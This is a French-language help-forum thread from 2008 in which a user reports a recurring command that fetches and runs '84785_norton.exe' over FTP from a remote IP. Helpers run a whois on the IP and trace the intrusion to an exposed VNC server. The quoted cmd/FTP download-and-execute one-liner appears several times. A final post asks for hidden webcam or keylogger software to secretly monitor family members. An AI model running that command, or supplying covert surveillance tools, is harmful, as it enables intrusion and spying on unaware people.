* "dax" pourrait redonner la commande exacte qui est envoyée, et nous dire que c'est pas son ip à lui o_O ;)
"j'ai la commande suivante qui s'exécute : cmd /c echo OPEN 82.233.255.7 24112>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit. Je vois des fenêtres qui s'ouvrent et qui se ferment" ...
Merci !
.
"j'ai la commande suivante qui s'exécute : cmd /c echo OPEN 82.233.255.7 24112>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit. Je vois des fenêtres qui s'ouvrent et qui se ferment" ...
* Whois : https://www.frameip.com/whois/
Voici les résultats du whois pour l'adresse IP 82.233.255.7
C'est le serveur whois.ripe.net qui possède l'information suivante :
% This is the RIPE Whois query server #3.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html
% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.
% Information related to '82.233.252.0 - 82.233.255.255'
inetnum: 82.233.252.0 - 82.233.255.255
netname: FR-PROXAD-ADSL
descr: Proxad / Free SAS
descr: Static pool (Freebox)
descr: evr91-2 (corbeil)
descr: NCC#2003105812
country: FR
admin-c: ACP23-RIPE
tech-c: TCP8-RIPE
status: ASSIGNED PA
remarks: Spam/Abuse requests: mailto:abuse@proxad.net
mnt-by: PROXAD-MNT
source: RIPE # Filtered
role: Administrative Contact for ProXad
address: Free SAS / ProXad
address: 8, rue de la Ville L'Eveque
address: 75008 Paris
phone: +33 1 73 50 20 00
fax-no: +33 1 73 92 25 69
remarks: trouble: Information: http://www.proxad.net/
remarks: trouble: Spam/Abuse requests: mailto:abuse@proxad.net
admin-c: RA999-RIPE
tech-c: FG4214-RIPE
nic-hdl: ACP23-RIPE
mnt-by: PROXAD-MNT
source: RIPE # Filtered
abuse-mailbox: abuse@proxad.net
role: Technical Contact for ProXad
address: Free SAS / ProXad
address: 8, rue de la Ville L'Eveque
address: 75008 Paris
phone: +33 1 73 50 20 00
fax-no: +33 1 73 92 25 69
remarks: trouble: Information: http://www.proxad.net/
remarks: trouble: Spam/Abuse requests: mailto:abuse@proxad.net
admin-c: RA999-RIPE
tech-c: FG4214-RIPE
nic-hdl: TCP8-RIPE
mnt-by: PROXAD-MNT
source: RIPE # Filtered
abuse-mailbox: abuse@proxad.net
% Information related to '82.224.0.0/11AS12322'
route: 82.224.0.0/11
descr: ProXad network / Free SAS
descr: Paris, France
origin: AS12322
mnt-by: PROXAD-MNT
source: RIPE # Filtered
Merci !
"j'ai la commande suivante qui s'exécute : cmd /c echo OPEN 82.233.255.7 24112>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit. Je vois des fenêtres qui s'ouvrent et qui se ferment" ...
* Whois : https://www.frameip.com/whois/
Voici les résultats du whois pour l'adresse IP 82.233.255.7
C'est le serveur whois.ripe.net qui possède l'information suivante :
% This is the RIPE Whois query server #3.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html
% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.
% Information related to '82.233.252.0 - 82.233.255.255'
inetnum: 82.233.252.0 - 82.233.255.255
netname: FR-PROXAD-ADSL
descr: Proxad / Free SAS
descr: Static pool (Freebox)
descr: evr91-2 (corbeil)
descr: NCC#2003105812
country: FR
admin-c: ACP23-RIPE
tech-c: TCP8-RIPE
status: ASSIGNED PA
remarks: Spam/Abuse requests: mailto:abuse@proxad.net
mnt-by: PROXAD-MNT
source: RIPE # Filtered
role: Administrative Contact for ProXad
address: Free SAS / ProXad
address: 8, rue de la Ville L'Eveque
address: 75008 Paris
phone: +33 1 73 50 20 00
fax-no: +33 1 73 92 25 69
remarks: trouble: Information: http://www.proxad.net/
remarks: trouble: Spam/Abuse requests: mailto:abuse@proxad.net
admin-c: RA999-RIPE
tech-c: FG4214-RIPE
nic-hdl: ACP23-RIPE
mnt-by: PROXAD-MNT
source: RIPE # Filtered
abuse-mailbox: abuse@proxad.net
role: Technical Contact for ProXad
address: Free SAS / ProXad
address: 8, rue de la Ville L'Eveque
address: 75008 Paris
phone: +33 1 73 50 20 00
fax-no: +33 1 73 92 25 69
remarks: trouble: Information: http://www.proxad.net/
remarks: trouble: Spam/Abuse requests: mailto:abuse@proxad.net
admin-c: RA999-RIPE
tech-c: FG4214-RIPE
nic-hdl: TCP8-RIPE
mnt-by: PROXAD-MNT
source: RIPE # Filtered
abuse-mailbox: abuse@proxad.net
% Information related to '82.224.0.0/11AS12322'
route: 82.224.0.0/11
descr: ProXad network / Free SAS
descr: Paris, France
origin: AS12322
mnt-by: PROXAD-MNT
source: RIPE # Filtered
Merci !
Salut ^ ^)
Après lecture sur d'autres forums et aides ; avec présence de 'Malekal_morte', mais il ne parle pas de vnc :
https://forum.hardware.fr/hfr/WindowsSoftware/Securite/intrusion-vnc-sujet_255658_1.htm
http://forum.telecharger.01net.com/telecharger/securite_virus_et_assimiles/trojan_et
_spywares/des_lignes_de_commande_apparaissent__urgent-408983/messages-1.html
http://forum.telecharger.01net.com/telecharger/securite_virus_et_assimiles/trojan_et
_spywares/lancements_intempestifs_-414187/messages-1.html
https://www.clubic.com/forum/t/piratage-ou-pas-piratage/159713
Le serveur 'VNC' semble être un point faible de sécurité ; le point faible ...
Tu l'as sur ton pc 'dax' ; VNC :
C:\Program Files\RealVNC\VNC4\WinVNC4.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - RealVNC Ltd. - C:\Program Files\RealVNC\VNC4\WinVNC4.exe
Désinstalles ou vérifies les paramètres de sécurités du logiciel VNC que TU?! a installé
!! Les pc qui vous attaques, peuvent êtres des 'PC Zombis' ; et leur propriétaire n'en n'ont peut-être pas conscience.
=> J'espère qu'ils n'en n'ont réellement pas conscience pour ne pas laisser faire.
* L'utilisateur dont l'ip fixe est dans la commande fourni par 'dax' n'est peut-être pas coupable ; sauf à avoir un PC peut-être Zombi et donc pas sécurisé .
Dégroupage Free : Liste complète des Dslam :
http://corindon.free.fr/Dslamcomp.html
Dpt ; Ville ; NRA ; Nom du NRA ; Dslam ; Adresse IP Dslam ; #
91 ; ZP Paris 91 ; EVR91 ; Evry ; evr91-2 ; 213.228.23.22 ; 1593
Dégroupage Free : connexions des DSLAM :
1. http://francois04.free.fr/connex_dslam.php?ip=82.233.255.7&periode=T
L'adresse 82.233.255.7 correspond (normalement) à la carte n° 10 du Dslam (chipset n° 0, position n° 6) - Dslam V2
2. http://francois04.free.fr/nav.php?niv=5&nom=evr91-2 (cliquez sur 'evr91-2')
Merci !
Après lecture sur d'autres forums et aides ; avec présence de 'Malekal_morte', mais il ne parle pas de vnc :
https://forum.hardware.fr/hfr/WindowsSoftware/Securite/intrusion-vnc-sujet_255658_1.htm
http://forum.telecharger.01net.com/telecharger/securite_virus_et_assimiles/trojan_et
_spywares/des_lignes_de_commande_apparaissent__urgent-408983/messages-1.html
http://forum.telecharger.01net.com/telecharger/securite_virus_et_assimiles/trojan_et
_spywares/lancements_intempestifs_-414187/messages-1.html
https://www.clubic.com/forum/t/piratage-ou-pas-piratage/159713
Le serveur 'VNC' semble être un point faible de sécurité ; le point faible ...
Tu l'as sur ton pc 'dax' ; VNC :
C:\Program Files\RealVNC\VNC4\WinVNC4.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - RealVNC Ltd. - C:\Program Files\RealVNC\VNC4\WinVNC4.exe
Désinstalles ou vérifies les paramètres de sécurités du logiciel VNC que TU?! a installé
!! Les pc qui vous attaques, peuvent êtres des 'PC Zombis' ; et leur propriétaire n'en n'ont peut-être pas conscience.
=> J'espère qu'ils n'en n'ont réellement pas conscience pour ne pas laisser faire.
* L'utilisateur dont l'ip fixe est dans la commande fourni par 'dax' n'est peut-être pas coupable ; sauf à avoir un PC peut-être Zombi et donc pas sécurisé .
Dégroupage Free : Liste complète des Dslam :
http://corindon.free.fr/Dslamcomp.html
Dpt ; Ville ; NRA ; Nom du NRA ; Dslam ; Adresse IP Dslam ; #
91 ; ZP Paris 91 ; EVR91 ; Evry ; evr91-2 ; 213.228.23.22 ; 1593
Dégroupage Free : connexions des DSLAM :
1. http://francois04.free.fr/connex_dslam.php?ip=82.233.255.7&periode=T
L'adresse 82.233.255.7 correspond (normalement) à la carte n° 10 du Dslam (chipset n° 0, position n° 6) - Dslam V2
2. http://francois04.free.fr/nav.php?niv=5&nom=evr91-2 (cliquez sur 'evr91-2')
Merci !
Bonjour,
D'abord merci à tous et à toutes pour vos réponse. Deuxiement, je vous rassure je ne me promène pas à poi chez moi ce n'est pas mon truc!!!. Pour l'adresse IP, ce n'est pas la mienne je le confirme. Je 'ai jamais installé de programme espion chez moi, je vais le desinstaller. Mais hélas, je suis sur que qq un s'amuse à distance avec mon ordi je vois des fenetres s'ouvrire et se fermer ttes seules. Voici la commande qui se lance tte seules dés le demarrage et ensuite à des intervalles de temps differents ça peut etre ttes les 30 secondes ou les 2 min:
ftp> OPEN 82.233.21.240 5426
Connecté à 82.233.21.240.
220 Microsoft FTP Service.
ftp> GET 84785_norton.exe
200 PORT command successful.
150 Opening BINARY mode data connection.
le fichiet 84785_norton.exe est une application qui fait 0ko, je l'ai supprimé plusieurs fois mais il est recrée dés que la commande :
cmd /c echo OPEN 82.233.103.227 22176>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit
s'execute. Mais de toute façon je suis sur qu'il y a qq qui s'amuse avec mon ordi, je vois des fenetres qui s'ouvrent ttes seules comme la corbeille, mon ZEN V series media explorer
Merci et trés bonne soirée
D'abord merci à tous et à toutes pour vos réponse. Deuxiement, je vous rassure je ne me promène pas à poi chez moi ce n'est pas mon truc!!!. Pour l'adresse IP, ce n'est pas la mienne je le confirme. Je 'ai jamais installé de programme espion chez moi, je vais le desinstaller. Mais hélas, je suis sur que qq un s'amuse à distance avec mon ordi je vois des fenetres s'ouvrire et se fermer ttes seules. Voici la commande qui se lance tte seules dés le demarrage et ensuite à des intervalles de temps differents ça peut etre ttes les 30 secondes ou les 2 min:
ftp> OPEN 82.233.21.240 5426
Connecté à 82.233.21.240.
220 Microsoft FTP Service.
ftp> GET 84785_norton.exe
200 PORT command successful.
150 Opening BINARY mode data connection.
le fichiet 84785_norton.exe est une application qui fait 0ko, je l'ai supprimé plusieurs fois mais il est recrée dés que la commande :
cmd /c echo OPEN 82.233.103.227 22176>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit
s'execute. Mais de toute façon je suis sur qu'il y a qq qui s'amuse avec mon ordi, je vois des fenetres qui s'ouvrent ttes seules comme la corbeille, mon ZEN V series media explorer
Merci et trés bonne soirée
magicien10024
Messages postés
3174
Date d'inscription
mardi 22 janvier 2008
Statut
Membre
Dernière intervention
28 octobre 2018
283
6 févr. 2008 à 21:04
6 févr. 2008 à 21:04
as tu configuré correctement ton firewall ?
as tu installé zeb protect ?
as tu installé zeb protect ?
Bonsoir,
Pour le firewall, il me semble que je l'ai bien configuré, et je n'ai pas zeb protect, ou je peux le trouver?il y a un mois mon anti virus a detecté un programme espion WORM_SDBOT.FGK, il n'a pas reussi à le supprimer, j 'ai supprimé le fichier à la main. Mais j'ai remarqué qq chose depuis hier, anonyme m'a mis sur la piste de VNC, j' ai desinstallé ce logiciel, et depuis la fameuse commande ne se lance plus, je ne crie pas victoire pour autant. J'attends de voir si c'est vraiment ça la cause ou pas. En tout cas merci infiniment à vous tous, c'est tres sympa de se sentir aidée et je vous souhaite une agreable soirée.
Pour le firewall, il me semble que je l'ai bien configuré, et je n'ai pas zeb protect, ou je peux le trouver?il y a un mois mon anti virus a detecté un programme espion WORM_SDBOT.FGK, il n'a pas reussi à le supprimer, j 'ai supprimé le fichier à la main. Mais j'ai remarqué qq chose depuis hier, anonyme m'a mis sur la piste de VNC, j' ai desinstallé ce logiciel, et depuis la fameuse commande ne se lance plus, je ne crie pas victoire pour autant. J'attends de voir si c'est vraiment ça la cause ou pas. En tout cas merci infiniment à vous tous, c'est tres sympa de se sentir aidée et je vous souhaite une agreable soirée.
Salut ^ ^)
C'était en gras au Post #13 ;) :
Désinstalles ou vérifies les paramètres de sécurités du logiciel VNC que TU ?! a installé !
Merci !
C'était en gras au Post #13 ;) :
Désinstalles ou vérifies les paramètres de sécurités du logiciel VNC que TU ?! a installé !
Merci !
magicien10024
Messages postés
3174
Date d'inscription
mardi 22 janvier 2008
Statut
Membre
Dernière intervention
28 octobre 2018
283
7 févr. 2008 à 20:31
7 févr. 2008 à 20:31
je 'avais fait un lien post 2
https://www.zebulon.fr/dossiers/autres/40-zebprotect.html
ton probléme es t-il resolu
https://www.zebulon.fr/dossiers/autres/40-zebprotect.html
ton probléme es t-il resolu
Bonjour,
Depuis que j'ai desinstallé VNC4, je ne vois plus de "bizareries" sur mon pc, est ce que le pb est definitivement résolu, je l'espère. ça fait plaisir de pouvoir travailler ss etre dérangé. J ai installé zeb protect merci magicien, anonyme et ts les autres pour votre aide.
Bonne journée
Depuis que j'ai desinstallé VNC4, je ne vois plus de "bizareries" sur mon pc, est ce que le pb est definitivement résolu, je l'espère. ça fait plaisir de pouvoir travailler ss etre dérangé. J ai installé zeb protect merci magicien, anonyme et ts les autres pour votre aide.
Bonne journée
méditation22
Messages postés
4
Date d'inscription
mardi 21 juin 2011
Statut
Membre
Dernière intervention
22 juin 2011
22 juin 2011 à 00:28
22 juin 2011 à 00:28
bonjour a tous escuser moi d'arriver c'est tout le contraire du sujet mais a ussage personnel vous m'avez l'air de vous y connaitre voilà je voudrais pirater mon propre pc c'est a dire le mettre sous surveillance car j'ai des enfants et un homme et j'aimerais impeut surveiller tout ça ! trouver un logiciel webcam invissible ou clavier enregistrer sans virus ! ceci n'est ppur haker les gens c'est pour mon entourage afin de proteger mon cocon svp pouvez vous m'aider
